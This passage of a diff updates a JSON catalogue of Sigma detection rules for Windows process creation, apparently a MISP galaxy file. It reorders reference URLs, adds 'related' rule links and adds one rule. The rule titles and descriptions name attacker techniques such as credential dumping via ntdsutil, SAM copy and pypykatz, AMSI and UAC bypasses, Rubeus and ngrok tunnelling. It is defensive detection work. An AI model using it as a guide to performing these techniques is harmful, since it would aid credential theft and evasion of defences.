"https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -45329,6 +58247,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", "value": "UAC Bypass Tools Using ComputerDefaults" }, @@ -45370,10 +58297,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ @@ -45397,8 +58324,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ @@ -45432,6 +58359,15 @@ "attack.t1197" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "value": "Monitoring For Persistence Via BITS" }, @@ -45481,6 +58417,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" }, @@ -45520,8 +58465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" ], "tags": [ @@ -45529,6 +58474,15 @@ "attack.t1563.002" ] }, + "related": [ + { + "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "value": "MSTSC Shadowing" }, @@ -45545,9 +58499,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", "https://twitter.com/cyb3rops/status/972186477512839170", "https://securelist.com/apt-slingshot/84312/", + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" ], "tags": [ @@ -45556,6 +58510,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", "value": "Equation Group DLL_U Load" }, @@ -45573,8 +58536,8 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "http://www.xuetr.com/", "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "http://www.xuetr.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" ], "tags": "No established tags" @@ -45596,13 +58559,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://twitter.com/xorJosh/status/1598646907802451969", "https://ngrok.com/docs", + "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", - "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml" ], "tags": [ @@ -45610,9 +58573,41 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "value": "Ngrok Usage" }, + { + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_set_unsecure_powershell_policy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_unsecure_powershell_policy.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "value": "Potential PowerShell Execution Policy Tampering - ProcCreation" + }, { "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", "meta": { @@ -45650,10 +58645,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" ], "tags": [ @@ -45661,6 +58656,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", "value": "Use of FSharp Interpreters" }, @@ -45677,8 +58681,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" ], "tags": [ @@ -45689,6 +58693,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", "value": "Office Applications Spawning Wmi Cli" }, @@ -45705,9 +58732,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995837734379032576", "https://twitter.com/pabraeken/status/999090532839313408", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", + "https://twitter.com/pabraeken/status/995837734379032576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" ], "tags": [ @@ -45715,6 +58742,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "value": "Execute Files with Msdeploy.exe" }, @@ -45740,6 +58776,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "value": "Suspicious Command With Teams Objects Pathes" }, @@ -45756,8 +58801,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/735261176745988096", "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120", + "https://twitter.com/mattifestation/status/735261176745988096", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" ], "tags": [ @@ -45768,28 +58813,6 @@ "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", "value": "Powershell AMSI Bypass via .NET Reflection" }, - { - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", - "creation_date": "2018/09/03", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "value": "Suspicious Encoded PowerShell Command Line" - }, { "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { @@ -45827,8 +58850,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/skelsec/pypykatz", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", + "https://github.com/skelsec/pypykatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" ], "tags": [ @@ -45836,6 +58859,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", "value": "Registry Parse with Pypykatz" }, @@ -45852,9 +58884,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ @@ -45877,9 +58909,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], "tags": [ @@ -45889,6 +58921,22 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", "value": "Suspicious Ldifde Command Usage" }, @@ -45917,6 +58965,29 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "value": "Windows Shell Spawning Suspicious Program" }, @@ -45933,10 +59004,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" ], "tags": [ @@ -45944,6 +59015,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", "value": "Accesschk Usage To Check Privileges" }, @@ -45968,6 +59048,15 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "value": "Use of TTDInject.exe" }, @@ -45993,6 +59082,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "value": "Using AppVLP To Circumvent ASR File Path Rule" }, @@ -46009,10 +59107,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" ], "tags": [ @@ -46020,6 +59118,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "value": "Suspicious Ping And Del Combination" }, @@ -46046,6 +59153,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", "value": "Suspicious Scheduled Task Creation Involving Temp Folder" }, @@ -46096,6 +59212,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", "value": "MsiExec Web Install" }, @@ -46122,6 +59254,22 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", "value": "GatherNetworkInfo.vbs Script Usage" }, @@ -46148,6 +59296,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "value": "LOLBIN Execution Of The FTP.EXE Binary" }, @@ -46173,6 +59337,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", "value": "Exploiting CVE-2019-1388" }, @@ -46197,6 +59370,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "value": "Always Install Elevated MSI Spawned Cmd And Powershell" }, @@ -46223,6 +59405,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "value": "CreateDump Process Dump" }, @@ -46272,6 +59463,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1af57a4b-460a-4738-9034-db68b880c665", "value": "PowerShell SAM Copy" }, @@ -46296,6 +59496,15 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", "value": "SILENTTRINITY Stager Execution" }, @@ -46312,9 +59521,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", - "https://github.com/GhostPack/Rubeus", "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://github.com/GhostPack/Rubeus", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" ], "tags": [ @@ -46325,6 +59534,15 @@ "attack.t1550.003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", "value": "Rubeus Hack Tool" }, @@ -46341,8 +59559,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", + "https://twitter.com/killamjr/status/1179034907932315648", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" ], "tags": [ @@ -46350,6 +59568,15 @@ "attack.t1059.005" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", "value": "QBot Process Creation" }, @@ -46376,6 +59603,22 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "value": "PrintBrm ZIP Creation of Extraction" }, @@ -46392,11 +59635,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", + "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html", "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe", - "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html", + "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml" ], "tags": [ @@ -46415,6 +59658,43 @@ "attack.s0039" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "value": "Net.exe Execution" }, @@ -46440,6 +59720,22 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", "value": "Shadow Copies Access via Symlink" }, @@ -46464,6 +59760,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9", "value": "Renamed Msdt.exe" }, @@ -46515,6 +59820,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", "value": "NSudo Tool Execution" }, @@ -46539,6 +59853,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0403d67d-6227-4ea8-8145-4e72db7da120", "value": "UtilityFunctions.ps1 Proxy Dll" }, @@ -46555,10 +59878,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", - "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" ], "tags": [ @@ -46566,6 +59889,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 